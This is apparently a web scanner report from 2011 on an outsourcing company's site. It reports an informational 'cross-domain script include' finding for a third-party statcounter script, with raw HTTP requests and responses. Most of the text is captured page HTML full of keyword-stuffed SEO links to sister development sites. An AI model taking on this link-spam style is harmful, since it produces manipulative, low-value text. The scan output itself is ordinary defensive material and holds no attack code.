href="http://www.flashapplicationdevelopment.com/flash-application-development-yonkers.html" target="_blank" title="flash application development yonkers,flash website development yonkers,hire flash developers yonkers">flash application development yonkers</a><a href="http://www.flashapplicationdevelopment.com/adobe-flash-media-server-solutions.html" target="_blank" title="flash media server solutions,flash media server development,flash media server programming">flash media server solutions</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-atlanta.html" target="_blank" title="mobile application development atlanta,iphone,blackberry">mobile application development atlanta</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-salisbury.html" target="_blank" title="flash application development salisbury,flash website development salisbury,hire flash developers salisbury">flash application development salisbury</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-sunderland.html" target="_blank" title="flash application development sunderland,flash website development sunderland,hire flash developers sunderland">flash application development sunderland</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-dallas.html" target="_blank" title="mobile application development dallas,iphone,blackberry">mobile application development dallas</a><a href="http://www.phpwebapplicationdevelopment.com/midgard-development.html" target="_blank" title="midgard development,midgard developers,midgard php developers">midgard development</a><a href="http://www.webapplicationdevelopmentcompanies.com/default.html" target="_blank" title="web application development company,,">web application development company</a><a href="http://www.webapplicationdevelopmentcompanies.com/secure-web-application-development.html" target="_blank" title="secure web application development,,">secure web application development</a><a href="http://www.ipadsoftwareindia.com/apple-ipad-application-development.html" target="_blank" title="ipad application development,apple ipad application development,apple ipad apps development">ipad application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-san-antonio.html" target="_blank" title="mobile application development san antonio,iphone,blackberry">mobile application development san antonio</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-exeter.html" target="_blank" title="flash application development exeter,flash website development exeter,hire flash developers exeter">flash application development exeter</a><a href="http://www.phpwebapplicationdevelopment.com/phpdevshell-development.html" target="_blank" title="phpdevshell development,phpdevshell developers,phpdevshell php developers">phpdevshell development</a><a href="http://www.perlwebdevelopment.com/rose db-development.html" target="_blank" title="rose::db development,rose::db developers,rose::db perl developers">rose::db development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-omaha.html" target="_blank" title="flash application development omaha,flash website development omaha,hire flash developers omaha">flash application development omaha</a><a href="http://www.flashapplicationdevelopment.com/hospitality-industry.html" target="_blank" title="flash hospitality industry solutions,flash based hospitality industry website,dynamic website for hospitality industry">flash hospitality industry solutions</a><a href="http://www.perlwebdevelopment.com/cgi application-development.html" target="_blank" title="cgi::application development,cgi::application developers,cgi::application perl developers">cgi::application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-mumbai.html" target="_blank" title="mobile application development mumbai,iphone,blackberry">mobile application development mumbai</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-indianapolis.html" target="_blank" title="mobile application development indianapolis,iphone,blackberry">mobile application development indianapolis</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-salisbury.html" target="_blank" title="mobile application development salisbury,iphone,blackberry">mobile application development salisbury</a><a href="http://www.pythonwebdevelopment.com/topsite-templating-system-development.html" target="_blank" title="topsite templating system development,topsite templating system developers,topsite templating system python developers">topsite templating system development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-mumbai.html" target="_blank" title="flash application development mumbai,flash website development mumbai,hire flash developers mumbai">flash application development mumbai</a><a href="http://www.mobiledevelopmentindia.com/android-mobile-application-development.html" target="_blank" title="android mobile application development,android mobile software development,android based mobile applications">android mobile application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-brisbane.html" target="_blank" title="mobile application development brisbane,iphone,blackberry">mobile application development brisbane</a>
...[SNIP]...
</a><a href="http://www.ipadsoftwareindia.com/contact-us.html" target="_blank" title="ipad application development,ipad software development,ipad application developers">ipad application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-ontario.html" target="_blank" title="mobile application development ontario,iphone,blackberry">mobile application development ontario</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-banner-design.html" target="_blank" title="flash banner design,flash banner designing services,flash banner creation">flash banner design</a><a href="http://www.phpsoftwaredevelopment.com/mysql-database-application-development.html" target="_blank" title="mysql database application development,,">mysql database application development</a><a href="http://www.perlwebdevelopment.com/gantry-development.html" target="_blank" title="gantry development,gantry developers,gantry perl developers">gantry development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-hull.html" target="_blank" title="flash application development hull,flash website development hull,hire flash developers hull">flash application development hull</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/windows-mobile-application-development.html" target="_blank" title="windows mobile application development india,windows mobile software development indial,windows mobile programming india">windows mobile application development india</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-canberra-queanbeyan.html" target="_blank" title="mobile application development canberra-queanbeyan,iphone,blackberry">mobile application development canberra-queanbeyan</a><a href="http://www.perlwebdevelopment.com/mason-development.html" target="_blank" title="mason development,mason developers,mason perl developers">mason development</a>
...[SNIP]...
</a><a href="http://www.applicationdevelopmentweb.com/outsource-web-application-development.html" target="_blank" title="outsource web application development,web application development company,offshore web application development company">outsource web application development</a><a href="http://www.customwebdevelopmentcompany.com/custom-website-development-company.html" target="_blank" title="custom website development company,custom website development,custom development company">custom website development company</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/offshore-mobile-application-development.html" target="_blank" title="offshore mobile application development,offshore mobile software development,offshore mobile applications programming">offshore mobile application development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-long-beach.html" target="_blank" title="flash application development long beach,flash website development long beach,hire flash developers long beach">flash application development long beach</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-fremont.html" target="_blank" title="flash application development fremont,flash website development fremont,hire flash developers fremont">flash application development fremont</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-westminster.html" target="_blank" title="flash application development westminster,flash website development westminster,hire flash developers westminster">flash application development westminster</a><a href="http://www.flashdevelopersindia.com/flash-game-programming-india.html" target="_blank" title="flash game programming india,flash games development india,flash game developers india">flash game programming india</a><a href="http://www.mobiledevelopmentindia.com/sms-gateway-integration.html" target="_blank" title="sms gateway integration,,">sms gateway integration</a><a href="http://www.mobiledevelopmentindia.com/blackberry-mobile-game-development.html" target="_blank" title="blackberry mobile game development,mobile games development india,offshore mobile games development">blackberry mobile game development</a><a href="http://www.flashapplicationdevelopment.com/c2c-flash-development.html" target="_blank" title="c2c flash development,c2c flash applications programming,c2c flash customized solutions">c2c flash development</a><a href="http://www.pythonwebdevelopment.com/pyjamas-development.html" target="_blank" title="pyjamas development,pyjamas developers,pyjamas python developers">pyjamas development</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-san-francisco.html" target="_blank" title="flash application development san francisco,flash website development san francisco,hire flash developers san francisco">flash application development san francisco</a>
...[SNIP]...
</a><a href="http://www.perlwebdevelopment.com/maypole-development.html" target="_blank" title="maypole development,maypole developers,maypole perl developers">maypole development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-winchester.html" target="_blank" title="mobile application development winchester,iphone,blackberry">mobile application development winchester</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-hyderabad.html" target="_blank" title="flash application development hyderabad,flash website development hyderabad,hire flash developers hyderabad">flash application development hyderabad</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-london.html" target="_blank" title="flash application development london,flash website development london,hire flash developers london">flash application development london</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-winchester.html" target="_blank" title="flash application development winchester,flash website development winchester,hire flash developers winchester">flash application development winchester</a><a href="http://www.pythonwebdevelopment.com/contact-python-developers.html" target="_blank" title="contact python developers,contact python web development company,python programmers">contact python developers</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/default.html" target="_blank" title="mobile application development india,mobile software development india,mobile applications programming india">mobile application development india</a>
...[SNIP]...
</a><a href="http://www.phpwebapplicationdevelopment.com/akelos-development.html" target="_blank" title="akelos development,akelos developers,akelos php developers">akelos development</a><a href="http://www.androidmobiledevelopment.com/android-healthcare-application.html" target="_blank" title="android healthcare application,android application development,google android applications">android healthcare application</a><a href="http://www.mobiledevelopmentindia.com/asp-net-mobile-application-development.html" target="_blank" title="asp.net mobile application development,asp.net mobile software development,asp.net applications">asp.net mobile application development</a>
...[SNIP]...
</a><a href="http://www.webapplicationdevelopmentcompanies.com/web-application-development-firm.html" target="_blank" title="web application development firm,,">web application development firm</a><a href="http://www.flashapplicationdevelopment.com/agile-development-model.html" target="_blank" title="agile development model,agile development process,agile software development">agile development model</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-omaha.html" target="_blank" title="mobile application development omaha,iphone,blackberry">mobile application development omaha</a><a href="http://www.androidmobiledevelopment.com/default.html" target="_blank" title="android mobile application development,android application development,android application framework">android mobile application development</a><a href="http://www.flashapplicationdevelopment.com/project-confidentiality.html" target="_blank" title="project confidentiality,client confidentiality,non-disclosure agreements with clients">project confidentiality</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-phoenix.html" target="_blank" title="flash application development phoenix,flash website development phoenix,hire flash developers phoenix">flash application development phoenix</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-philadelphia.html" target="_blank" title="flash application development philadelphia,flash website development philadelphia,hire flash developers philadelphia">flash application development philadelphia</a><a href="http://www.flashapplicationdevelopment.com/resources.html" target="_blank" title="flash application development,flash application developer,flash programming">flash application development</a>
...[SNIP]...
</a><a href="http://www.javawebapplications.com/java-web-application-resources.html" target="_blank" title="java web application resources,java web application development,java web application development">java web application resources</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-testing.html" target="_blank" title="mobile application testing,mobile application testing services,custom mobile application testing">mobile application testing</a><a href="http://www.mobiledevelopmentindia.com/hire-mobile-application-developer.html" target="_blank" title="hire mobile application developer,hire mobile software developer,hire programmers from mobile development india">hire mobile application developer</a><a href="http://www.phpsoftwaredevelopment.com/wordpress-customization.html" target="_blank" title="wordpress customization,,">wordpress customization</a><a href="http://www.flashapplicationdevelopment.com/flash-outsourcing-services.html" target="_blank" title="flash development outsourcing services,flash application development,flash programming">flash development outsourcing services</a><a href="http://www.flashapplicationdevelopment.com/banking-and-finance-industry.html" target="_blank" title="flash banking & finance industry solutions,flash based banking & finance website,flash banking & finance dynamic website">flash banking & finance industry solutions</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-wolverhampton.html" target="_blank" title="flash application development wolverhampton,flash website development wolverhampton,hire flash developers wolverhampton">flash application development wolverhampton</a><a href="http://www.perlwebdevelopment.com/perl-framework-development.html" target="_blank" title="perl framework development,perl framework developers,perl open source framework implementation">perl framework development</a><a href="http://www.phpsoftwaredevelopment.com/cakephp-application-development.html" target="_blank" title="cakephp application development,,">cakephp application development</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/python-programmers.html" target="_blank" title="python programmers,python web programmers,python programmer">python programmers</a><a href="http://www.flashapplicationdevelopment.com/media-industry.html" target="_blank" title="flash media industry solutions,flash media industry applications development,flash based media industry website">flash media industry solutions</a><a href="http://www.javawebapplications.com/java-web-application-development-contact-us.html" target="_blank" title="java web application development,j2ee web application development,java web programming">java web application development</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/graphite-development.html" target="_blank" title="graphite development,graphite developers,graphite python developers">graphite development</a><a href="http://www.perlwebdevelopment.com/perl-development.html" target="_blank" title="perl development,perl web development,perl software development">perl development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-stoke-on-trent.html" target="_blank" title="flash application development stoke-on-trent,flash website development stoke-on-trent,hire flash developers stoke-on-trent">flash application development stoke-on-trent</a><a href="http://www.perlwebdevelopment.com/reaction-development.html" target="_blank" title="reaction development,reaction developers,reaction perl developers">reaction development</a>
...[SNIP]...
</a><a href="http://www.androidmobiledevelopment.com/android-theme-application.html" target="_blank" title="android themes application,android application development,google android applications">android themes application</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-leicester.html" target="_blank" title="mobile application development leicester,iphone,blackberry">mobile application development leicester</a><a href="http://www.webapplicationdevelopmentcompanies.com/web-application-development-asp.net.html" target="_blank" title="web application development asp.net,,">web application development asp.net</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-multimedia-presentation.html" target="_blank" title="flash multimedia presentation,flash multimedia presentations,flash multimedia design">flash multimedia presentation</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-canberra.html" target="_blank" title="mobile application development canberra,iphone,blackberry">mobile application development canberra</a><a href="http://www.androidmobiledevelopment.com/android-travel-application.html" target="_blank" title="android travel application,android application development,android wireless travel application">android travel application</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-sheffield.html" target="_blank" title="flash application development sheffield,flash website development sheffield,hire flash developers sheffield">flash application development sheffield</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-boston.html" target="_blank" title="flash application development boston,flash website development boston,hire flash developers boston">flash application development boston</a><a href="http://www.flashapplicationdevelopment.com/flash-mobile-application-development.html" target="_blank" title="flash mobile application development,flash mobile application developers,flash mobile development outsourcing services">flash mobile application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-sacramento.html" target="_blank" title="mobile application development sacramento,iphone,blackberry">mobile application development sacramento</a>
...[SNIP]...
</a><a href="http://www.applicationdevelopmentweb.com/web-application-development-technologies.html" target="_blank" title="web application development technologies,lamp web application development technologies (linux,apache">web application development technologies</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-austin.html" target="_blank" title="mobile application development austin,iphone,blackberry">mobile application development austin</a><a href="http://www.aspnetprogrammers.com/csla-development.html" target="_blank" title="csla development,csla developers,csla .net developers">csla development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-cleveland.html" target="_blank" title="mobile application development cleveland,iphone,blackberry">mobile application development cleveland</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-newark.html" target="_blank" title="mobile application development newark,iphone,blackberry">mobile application development newark</a><a href="http://www.flashapplicationdevelopment.com/flash-crm-development.html" target="_blank" title="flash crm development,flash crm programming,flash crm developers">flash crm development</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-noida.html" target="_blank" title="flash application development noida,flash website development noida,hire flash developers noida">flash application development noida</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/meego-application-development.html" target="_blank" title="meego application development,meego framework,meego software platform">meego application development</a><a href="http://www.phpsoftwaredevelopment.com/solutions.html" target="_blank" title="solutions,,">solutions</a><a href="http://www.flashapplicationdevelopment.com/fmcg-industry.html" target="_blank" title="flash fmcg industry solutions,flash based fmcg website,flash fmcg dynamic website">flash fmcg industry solutions</a><a href="http://www.webapplicationdevelopmentcompanies.com/web-application-development-europe.html" target="_blank" title="web application development europe,,">web application development europe</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-san-diego.html" target="_blank" title="flash application development san diego,flash website development san diego,hire flash developers san diego">flash application development san diego</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-exeter.html" target="_blank" title="mobile application development exeter,iphone,blackberry">mobile application development exeter</a><a href="http://www.mobiledevelopmentindia.com/services.html" target="_blank" title="mobile application development,windows mobile application development,j2me mobile application development">mobile application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-newport.html" target="_blank" title="mobile application development newport,iphone,blackberry">mobile application development newport</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-atlanta.html" target="_blank" title="flash application development atlanta,flash website development atlanta,hire flash developers atlanta">flash application development atlanta</a><a href="http://www.phpwebapplicationdevelopment.com/symfony-development.html" target="_blank" title="symfony development,symfony developers,symfony php developers">symfony development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-davenport.html" target="_blank" title="mobile application development davenport,iphone,blackberry">mobile application development davenport</a>
...[SNIP]...
</a><a href="http://www.phpwebapplicationdevelopment.com/php-mvc-development.html" target="_blank" title="php mvc development,php mvc developers,php mvc php developers">php mvc development</a><a href="http://www.rubysoftwaredevelopment.com/ruby-development.html" target="_blank" title="ruby development,ruby web development,ruby software development">ruby development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-perth.html" target="_blank" title="flash application development perth,flash website development perth,hire flash developers perth">flash application development perth</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-detroit.html" target="_blank" title="mobile application development detroit,iphone,blackberry">mobile application development detroit</a><a href="http://www.phpwebapplicationdevelopment.com/php-developers.html" target="_blank" title="php developers,php web developers,php developer">php developers</a><a href="http://www.aspnetprogrammers.com/telerik-development.html" target="_blank" title="telerik development,telerik developers,telerik .net developers">telerik development</a><a href="http://www.flashapplicationdevelopment.com/adobe-air-development.html" target="_blank" title="adobe air development,adobe air programming,adobe air developers">adobe air development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-birmingham.html" target="_blank" title="mobile application development birmingham,iphone,blackberry">mobile application development birmingham</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/brew-mobile-application-development.html" target="_blank" title="brew mobile application development,brew mobile software development,brew applications development">brew mobile application development</a>
...[SNIP]...
</a><a href="http://www.customwebdevelopmentcompany.com/website-development-services.html" target="_blank" title="website development services,website development,website services">website development services</a><a href="http://www.flashdevelopersindia.com/resources.html" target="_blank" title="flash developers india,flash software development india,flash application development india">flash developers india</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-sydney.html" target="_blank" title="flash application development sydney,flash website development sydney,hire flash developers sydney">flash application development sydney</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-san-jose.html" target="_blank" title="mobile application development san jose,iphone,blackberry">mobile application development san jose</a><a href="http://www.phpwebapplicationdevelopment.com/prado-development.html" target="_blank" title="prado development,prado developers,prado php developers">prado development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-charlotte.html" target="_blank" title="flash application development charlotte,flash website development charlotte,hire flash developers charlotte">flash application development charlotte</a><a href="http://www.customwebdevelopmentcompany.com/custom-website-design-company.html" target="_blank" title="custom website design company,custom website design,custom design company">custom website design company</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-brisbane.html" target="_blank" title="flash application development brisbane,flash website development brisbane,hire flash developers brisbane">flash application development brisbane</a><a href="http://www.mobiledevelopmentindia.com/apple-ipad-application-development.html" target="_blank" title="apple ipad application development india,apple ipad application programming india,apple ipad apps development india">apple ipad application development india</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-boise.html" target="_blank" title="flash application development boise,flash website development boise,hire flash developers boise">flash application development boise</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-edinburgh.html" target="_blank" title="mobile application development edinburgh,iphone,blackberry">mobile application development edinburgh</a><a href="http://www.phpwebapplicationdevelopment.com/wasp-development.html" target="_blank" title="wasp development,wasp developers,wasp php developers">wasp development</a>
...[SNIP]...
</a><a href="http://www.phpsoftwaredevelopment.com/php-website-development.html" target="_blank" title="php website development,,">php website development</a><a href="http://www.phpsoftwaredevelopment.com/php-xml-web-services-development.html" target="_blank" title="php xml web services development,,">php xml web services development</a><a href="http://www.flashapplicationdevelopment.com/insurance-industry.html" target="_blank" title="flash insurance industry solutions,flash based insurance website,flash insurance dynamic website">flash insurance industry solutions</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/windows-mobile-game-development.html" target="_blank" title="windows mobile game development,windows mobile games programming,windows games programming offshore services">windows mobile game development</a><a href="http://www.flashdevelopersindia.com/red-5-development-india.html" target="_blank" title="red 5 development india,red 5 programming services india,red 5 server application development india">red 5 development india</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/pyxml-development.html" target="_blank" title="pyxml development,pyxml developers,pyxml python developers">pyxml development</a><a href="http://www.customwebdevelopmentcompany.com/custom-website-development.html" target="_blank" title="custom website development,custom development,website development">custom website development</a><a href="http://www.phpsoftwaredevelopment.com/mambo-cms-customization.html" target="_blank" title="mambo cms customization,,">mambo cms customization</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-chester.html" target="_blank" title="mobile application development chester,iphone,blackberry">mobile application development chester</a><a href="http://www.aspnetprogrammers.com/net-programming.html" target="_blank" title=".net programming,.net web programming,.net software programming">.net programming</a>
...[SNIP]...
</a><a href="http://www.androidmobiledevelopment.com/android-tools-application.html" target="_blank" title="android tools application,android application development,google android applications">android tools application</a><a href="http://www.phpwebapplicationdevelopment.com/contact-php-developers.html" target="_blank" title="contact php developers,contact php web development company,php programmers">contact php developers</a><a href="http://www.mobiledevelopmentindia.com/solutions.html" target="_blank" title="offshore mobile application solutions,mobile applications,mobile application development">offshore mobile application solutions</a><a href="http://www.phpsoftwaredevelopment.com/postgresql-database-application-development.html" target="_blank" title="postgresql database application development,,">postgresql database application development</a><a href="http://www.pythonwebdevelopment.com/silva-development.html" target="_blank" title="silva development,silva developers,silva python developers">silva development</a><a href="http://www.phpsoftwaredevelopment.com/mysql-database-maintenance.html" target="_blank" title="mysql database maintenance,,">mysql database maintenance</a><a href="http://www.phpwebapplicationdevelopment.com/flow3-development.html" target="_blank" title="flow3 development,flow3 developers,flow3 php developers">flow3 development</a><a href="http://www.mobiledevelopmentindia.com/mobile-game-development.html" target="_blank" title="mobile game development,mobile game development india,windows mobile game development">mobile game development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-newark.html" target="_blank" title="flash application development newark,flash website development newark,hire flash developers newark">flash application development newark</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-detroit.html" target="_blank" title="flash application development detroit,flash website development detroit,hire flash developers detroit">flash application development detroit</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-bradford.html" target="_blank" title="flash application development bradford,flash website development bradford,hire flash developers bradford">flash application development bradford</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-ireland.html" target="_blank" title="mobile application development ireland,iphone,blackberry">mobile application development ireland</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-bradford.html" target="_blank" title="mobile application development bradford,iphone,blackberry">mobile application development bradford</a>
...[SNIP]...
</a><a href="http://www.aspnetprogrammers.com/net-development-services.html" target="_blank" title=".net development services,.net web programming services,.net services">.net development services</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-fullerton.html" target="_blank" title="flash application development fullerton,flash website development fullerton,hire flash developers fullerton">flash application development fullerton</a>
...[SNIP]...
</a><a href="http://www.outsourcewebapplicationdevelopment.com/custom-software-development-outsourcing.html" target="_blank" title="custom software development outsourcing,,">custom software development outsourcing</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-pune.html" target="_blank" title="flash application development pune,flash website development pune,hire flash developers pune">flash application development pune</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-ireland.html" target="_blank" title="flash application development ireland,flash website development ireland,hire flash developers ireland">flash application development ireland</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/symbian-mobile-game-development.html" target="_blank" title="symbian mobile game development,symbian mobile games programming,offshore symbian mobile games programming">symbian mobile game development</a>
...[SNIP]...
</a><a href="http://www.phpsoftwaredevelopment.com/php-application-maintenance.html" target="_blank" title="php application maintenance,,">php application maintenance</a><a href="http://www.androidmobiledevelopment.com/android-job-search-application.html" target="_blank" title="android game application,android application development,google android applications">android game application</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-template-design.html" target="_blank" title="flash template design,flash design templates,flash template web design">flash template design</a><a href="http://www.androidmobiledevelopment.com/android-sports-application.html" target="_blank" title="android sports application,android application development,google android applications">android sports application</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-columbus.html" target="_blank" title="flash application development columbus,flash website development columbus,hire flash developers columbus">flash application development columbus</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-fullerton.html" target="_blank" title="mobile application development fullerton,iphone,blackberry">mobile application development fullerton</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-chicago.html" target="_blank" title="mobile application development chicago,iphone,blackberry">mobile application development chicago</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-worcester.html" target="_blank" title="mobile application development worcester,iphone,blackberry">mobile application development worcester</a><a href="http://www.phpsoftwaredevelopment.com/moodle-customization-and-implementation.html" target="_blank" title="moodle customization and implementation,,">moodle customization and implementation</a><a href="http://www.phpsoftwaredevelopment.com/joomla-crm-customization.html" target="_blank" title="joomla crm-customization,,">joomla crm-customization</a><a href="http://www.rubysoftwaredevelopment.com/camping-development.html" target="_blank" title="camping development,camping developers,camping ruby developers">camping development</a>
...[SNIP]...
</a><a href="http://www.webapplicationdevelopmentcompanies.com/web-application-development-uk.html" target="_blank" title="web application development uk,,">web application development uk</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-brighton.html" target="_blank" title="flash application development brighton,flash website development brighton,hire flash developers brighton">flash application development brighton</a><a href="http://www.pythonwebdevelopment.com/genshi-development.html" target="_blank" title="genshi development,genshi developers,genshi python developers">genshi development</a><a href="http://www.pythonwebdevelopment.com/web2py-development.html" target="_blank" title="web2py development,web2py developers,web2py python developers">web2py development</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-bombay.html" target="_blank" title="flash application development bombay,flash website development bombay,hire flash developers bombay">flash application development bombay</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/sitemap.html" target="_blank" title="flash application development,flash website development,flash internet application development">flash application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-stoke-on-trent.html" target="_blank" title="mobile application development stoke-on-trent,iphone,blackberry">mobile application development stoke-on-trent</a><a href="http://www.androidmobiledevelopment.com/android-tools-application.html" target="_blank" title="android tools application,android application development,google android applications">android tools application</a><a href="http://www.perlwebdevelopment.com/default.html" target="_blank" title="perl development,perl web developers,perl software development">perl development</a>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
6. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

6.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
6.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
6.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
